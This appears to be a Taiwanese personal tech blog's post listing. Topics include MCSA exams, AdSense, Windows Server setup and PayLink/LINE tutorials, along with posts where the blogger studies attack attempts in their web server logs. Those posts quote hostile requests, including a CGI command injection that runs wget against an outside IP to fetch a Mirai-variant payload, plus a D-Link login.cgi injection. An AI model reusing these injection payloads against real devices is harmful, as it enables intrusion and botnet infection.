取得Windows Server 2016 - MCSA

終於通過考試拿到 MCSA, 雖然說通過考試但還是有很多東西需要消化, (而且 Windows Server 2019 也出來了...😛)
本想申請紙本證書, 可是現在只提供電子檔證書, 只能自己印了

從 Web Log 學習系統漏洞 53

185.153.196.97 - - [09/Dec/2019:18:57:16 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.153.196.97 - - [09/Dec/2019:23:22:09 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.153.196.97 - - [10/Dec/2019:18:25:17 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1833 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

這幾天同一個IP出現這個 XDEBUG_SESSION_START=phpstorm 的東西
查了一下這個 phpstorm 是個程式設計的編輯器
似乎可以利用它來做遠端指令攻擊或是竊取資料
不過我的網站沒有這個東西, 不曉得為什麼連到我網站時可以回傳正確回應
再觀察個幾天看看

從 Web Log 學習系統漏洞 52

最近比較少 phpmyadmin 攻擊, 常來的也是之前都看過的或是百度蟑螂, 今天倒是來了一個有趣的:

208.113.204.14 - - [08/Dec/2019:20:16:19 +0800] "POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://80.82.67.209/richard;" 400 226 "-" "-"
208.113.204.14 - - [08/Dec/2019:20:16:23 +0800] "POST /cgi-bin/file_transfer.cgi?file_transfer=new&dir='Pa_Note;wget http://80.82.67.209/richard;" 400 226 "-" "-"

順著上面留的網址連過去, 發現了有趣的東西

問了一下估狗大神之後, 這個東西大概是個針對物聯網設備來攻擊的變種病毒, 可以攻擊的東西還真多, 以現在許多電子產品都能連上網路的情況來看真的是很危險

參考: New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices

全球IPv4位址耗盡?

今天上網時隨意一瞥發現了一篇新聞: 全球 IPv4 位址耗盡

全球五大區域網路註冊管理機構之一的歐洲網路協調中心 (RIPE NCC) 於11月25日宣布 IPv4 位址已全部用完, 該機構負責歐洲、中東和部分中亞的 IP 位址分配和註冊

RIPE NCC網站說明


(說了這麼久終於用完了...)

聊聊 MCSA 認證考試

最近終於去考了 MCSA 的認證考試(好貴...😥), 由於簽了保密協議所以我也不會透漏任何考題, 想知道的可以自己去估狗, 網路上真的非常多可以看

考題不能洩漏, 聊聊問卷調查應該沒問題吧, 在測驗之前會有一些問卷問題要你回答, 大概就是你為什麼來考試, 某些技術或領域你是否常使用, 這邊我很懷疑你回答這些問卷的答案會不會是作為後面派題的依據, 所以我也不敢回答太滿我是否熟悉這些技術, 免得題目出得太難, 應該是我想太多了吧, 哈哈 😆

從 Web Log 學習系統漏洞 51

最近很少 phpmyadmin 的資料庫攻擊, 反倒是很多 D-Link Router 的攻擊

/login.cgi?cli=aa ;wget

之前 從 Web Log 學習系統漏洞 18 就有寫過同樣的攻擊方式, 只是現在一堆沒有目標的 wget 不曉得想幹啥? 要擋 IP 也擋不完, 除非寫個指令在Server中對特定連線內容作阻擋

AdSense 廣告異動

早上收到一封來自 Google AdSense 的信, 想說幾天前不是才寄一封政策更新的信, 怎麼又來了, 打開一看, 原來是 AdSense 的廣告異動通知, 還不曉得是怎麼回事, 打開我的部落格一看, 真是有夠慘, 我好不容易排好的版面又被自動廣告亂塞亂插, 於是趕快進來修改

1. 果不其然, 標題下方被放了我很討厭的超大篇幅廣告

2. 文章段落中, 同樣也被塞了一個廣告

部落格網誌文章被盜?

有時候會無聊的用google去搜尋自己部落格網址, 看看google會搜尋到什麼樣的東西, 有時會看到有人引用我的網誌, 如果是教學相長的話我是很歡迎, 但是今天搜尋時看到的這個網站就很離譜了, 完完全全把某篇網誌文字及圖片拷貝在他的網站, 也沒有註明出處或是先知會我, 沒想到特地做了標記圖還是會被盜, 而且奇怪的是他的網站主要是一個健康資訊的網站, 不曉得為什麼會去張貼電腦資訊相關的文章?

盜用我網誌的網頁
Windows Server 2016 安裝 ADDS (AD網域服務)

盜用我網誌的網頁

盜用我網誌的網頁

這網站在美國, 使用 Linux 及 Nginx

AdSense 政策異動

最近收到一封來自 Google AdSense 的信, 內容說到他們的政策做了重大更新, 我猜大概是因為這幾個月來香港反送中事件的影響, Google 應該有不少廣告商是來自中國, 為了不得罪客戶而做出這樣的改變, 就如同之前 Youtube 上面哀鴻遍野的黃標事件, 突然之間許多 Youtuber 影片被標上黃標(停止廣告收益分潤), (我猜)因為之前有不少香港抗爭相關影片而得罪了廣告商吧, 現在只要有使用 AdSense 就會被納入管制, 違反規定 Google 也會不再發送廣告給你(或是停止廣告收益分潤)

Google AdSense 政策中原本就有的限制發布內容 (Google 發布商政策), 只要是侵犯智慧財產權、瀕危或保育類物種、危險或貶抑他人的內容、助長欺騙行為、陳述不實的內容、惡意或垃圾軟體、煽情露骨內容、外籍新娘、闔家適用內容中出現成人主題、兒童性虐待內容和戀童癖等內容, 影片或網誌中都是禁止發布

Google AdSense 政策中也列出了營利會受限的內容 (營利受限的內容), 其實也跟發布商政策差不多, 只要是內容中有色情內容、駭人聽聞的內容、炸藥、槍枝、槍械零件和相關產品、其他武器、菸草製品、毒品、酒精飲料販售或濫用、線上賭博、處方藥物、未經批准的藥品和保健補給品等, 就會被限制營利(停止廣告收益分潤)

其實上面的規定都還好, 只要你不放這些違法的內容就不用怕被停止廣告營利, 而我的部落格本來也不期待靠這個來賺錢, 廣告只是加減放好玩的

Google 21歲了

今天是Google 21歲的生日, 時光飛逝, 現在已經發展成一間世界大公司, 生活上很多東西也離不開它

借用一下Google的圖

維基百科

Google的早期版面

從 Web Log 學習系統漏洞 50

看這攻擊方式應該又是針對 phpmyadmin 漏洞, 老舊的 Windows Server 2008 及 Apache 2.4.25, 漏洞應該不少

從 Web Log 學習系統漏洞 49 - 韓國金融安全局?

這個韓國來的金融安全局不曉得怎樣, 去年就發現這個IP一直嘗試連線, 是被入侵成為殭屍電腦還是人為操作, 做金融安全卻不斷攻擊別人網站? 而且似乎都是想藉我的網站連到韓國的銀行, 不曉得想幹嘛? 上它的網站也找不到可以留言反應的地方, 不知該如何通知他們

1. 這個月到現在就有近千筆不明連線

2. 上網搜尋找到他的 domain

3. 經由 domain 連到它的網站, 全是韓文看不懂

4. 經估狗翻譯得知是韓國金融安全局, 不知道是國家機關還是民間單位?

5. 用它的連線關鍵字shinhan餵狗之後得到是新韓銀行

6. 用它的連線關鍵字ibk餵狗之後得到是韓國中小企業銀行

7. 用它的連線關鍵字woori餵狗之後得到是韓國友利銀行, 怎麼都是銀行? 不曉得想幹嘛?

Blogger Bug 圖片無法顯示？

這問題在我編輯上一篇時有發現到, 就是前兩個圖, 不管我刪除後重新上傳還是更名後重新上傳, 甚至檔案用不同的軟體重新儲存後再上傳, 這兩個圖在後台這裡就是看不到, 可是到前台卻能看到, 只是後來發現用 IE 瀏覽器時還是無法顯示, 這還是第一次遇到, 不曉得是哪邊出問題, 還是 Blogger 這邊的 Bug?

1. 後台這邊看不到前兩個圖

2. 前台 Chrome 瀏覽器可以看到

將 Windows Server 2019 英文版繁體中文化(中文-台灣)

如同 Windows Server 2016 一樣, 微軟在 Windows Server 2019 也沒有推出繁體中文版, 只能自行上網更新語言套件, 不過 2019 更新方式不同於 2016

1. 安裝好的 Server 2019 登入畫面, 顯示為英文畫面

2. 開始功能列一樣都是英文字

安裝 Windows Server 2019

雖然之前安裝過 Windows Server 2019 Essentials版, 這次再來玩玩 Windows Server 2019版, 微軟官方有一個 各版本Server比較表, 我就不再另做比較圖了

1. 在安裝之前看了一下 ISO 檔內容, 發現 Server 2019 或是 Essentials版都把 Nano Server 的相關套件拿掉了, 官網上也沒看到相關下載說明, 難道是微軟不玩Nano Server了？

2. 光碟(iso)載入後的開始畫面, 同樣的還是沒有支援台灣繁體中文(只能安裝英文版後再去更新語言)

w-studio.idv.tw

關於 Google Adsense 廣告位置放置-2

前面說到由於設定自動廣告的結果 Google 會亂塞造成整個網頁版面變得很亂, 於是只開啟錨定廣告與動態內嵌廣告, 剩下的就是利用自訂廣告單元來放到想放的地方, 雖然說 Google Adsense 政策中規定每個頁面最多只能放3個廣告單元, 但是我看有些人網誌放10幾個廣告也沒在怕, 所以Google到底是有沒有在抓也不曉得, 反正我本來也沒有想放太多廣告, 破壞了我精簡的版面

1. 在版面配置中編輯主版面的網誌文章工具

2. 勾選在文章之間顯示廣告, 但是上面規定一頁最多放3則廣告

關於 Google Adsense 廣告位置放置-1

之前談到利用 Google Adsense 來為自己網站收廣告費, 弄了很久才稍微改成我想要的版面, 不然直接使用自動廣告的話, 整個畫面被貼得亂七八糟, 真不曉得 Google 的運算方式是怎麼弄的, 可以把整個版面弄得這麼醜, 但是這些廣告不是你想放多少就能放多少, 除了 Adsense 政策中限制的東西外, 廣告的數量也是有規定, 違反的話是會被停權

1. 如果已經申請到 Google Adsense, 則可在「收益」項目中看到廣告顯示設定, 選擇任一個則會自動生成廣告單元程式碼, 然後在網頁中的該位置放置(這應該是以Blogger為主的設定)

w-studio.idv.tw

網路小白10

弄一堆 a 不曉得要衝三小?

從 Web Log 學習系統漏洞 48

兩個入侵, 應該是同一個人, 入侵方式一樣, 只是很受不了這些網路小白放著機器給人當跳板

1. 主機中記錄的Log

2. 連過去結果是 XAMPP

從 Web Log 學習系統漏洞 47

這次沒有什麼東西, 只是讓我感興趣的是它的作業系統版本, 應該是假的

54.79.77.20 - - [28/Aug/2019:14:24:59 +0800] "GET / HTTP/1.1" 200 1829 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
54.79.77.20 - - [28/Aug/2019:14:25:01 +0800] "GET / HTTP/1.1" 200 1829 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
54.79.77.20 - - [28/Aug/2019:14:25:02 +0800] "GET / HTTP/1.1" 200 1829 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
54.79.77.20 - - [28/Aug/2019:14:25:09 +0800] "GET / HTTP/1.1" 200 1829 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

一間託管公司, 不曉得要衝三小?

如何利用 LINE Creators Market 原創市集來賺錢 - 4. PayPal 驗證身分

完成了與玉山銀行帳戶連結之後, 再來就是要做 PayPal 帳號的身分驗證, 身分驗證方式有三種: 1.信用卡驗證 2.郵寄身分證明文件驗證(時間較慢) 3.打電話驗證(付費電話, 也是要郵寄身分證明文件), 我是使用比較方便的信用卡驗證

1. 到交易款項的項目頁面

2. 下拉畫面看到一個信用卡及扣帳卡的項目, 點擊連結新卡

如何利用 LINE Creators Market 原創市集來賺錢 - 3.申請玉山銀行帳戶與 PayPal 帳號連結

我個人是建議使用 IE 瀏覽器會比較順, 雖然網路銀行是不需要使用到讀卡機, 因為我太久沒用我的網路銀行, 帳號被停用必須使用提款卡重新啟用, 原本使用 Google Chrome, 結果一直卡在安裝WebATM元件, 我已經安裝好也重開瀏覽器甚至重新開機, 但是玉山銀行網站就是一直抓不到我的讀卡機, 只好去用 IE, 沒想到就順利抓到我的讀卡機也順利重新啟用我的網路銀行帳號(還好密碼還記得...)

1. 從 PayPal 跳轉到玉山銀行網站

2. 登入網路銀行之後, 在選項中找「玉山全球通PayPal服務」

如何利用 LINE Creators Market 原創市集來賺錢 - 2.申請 PayPal 帳號

申請好 LINE Creators Market 原創市集的帳號之後, 接著就是來申請 PayPal 帳號, 網路上有不少註冊申請教學, 不過都是舊版面, 跟我現在申請的網頁版面又變得不一樣, 有些地方真的是不曉得怎麼操作或是如何填寫, 弄了很久才弄好, 所以特地做一個2019版的申請教學

1. 首先到 PayPal 首頁, 如果沒申請過的就按下免費註冊

2. 因為是為了要收錢, 所以選擇使用 PayPal 接受交易款項

從 Web Log 學習系統漏洞 46

這次Log中一堆入侵程式碼, 估狗了一下又是Apache Struts2的漏洞攻擊, 而且這次對方主機是用 Tomcat Server 架 JBoss, 封了這網路小白的IP

如何利用 LINE Creators Market 原創市集來賺錢 - 1.申請LINE原創市集帳號

在申請Google AdSense之後, 又想到LINE原創市集中也是可以來賺錢的, 於是稍微估狗了一下就來開始了

1. 首先到 LINE Creators Market 原創市集首頁, 按下請點此註冊按鈕 (註:請先確認你已經有LINE的帳號及註冊的Email)

2. 接著登入LINE帳號後到此畫面, 勾選同意條款, 再輸入你的個人資料 (名字及住址都須寫英文, 寫中文不會過)

w-studio.idv.tw

解決電腦無法支援虛擬機器的方法

這十幾天因為電腦自動更新後無法再繼續使用虛擬機器,
求救客服也無解,
拿到維修中心也無法幫我降版BIOS,
必須送到資訊中心才有舊版BIOS降版,
送去的話就一個禮拜沒電腦用,
本來想說等到官網釋出新版BIOS後再來試試,
但最近才更新的,
下一版不曉得要等到什麼時候,
放棄之餘自己再開啟電腦BIOS來試試,
結果就被試出來,
而且還非常簡單,
真是蠢卡了十幾天 😆

開啟BIOS後, 到進階選項中, 在SVM Mode Enabled 狀態下, UMA Frame buffer Size 選擇 Auto, 對, 就是這麼簡單, 重開機之後沒有問題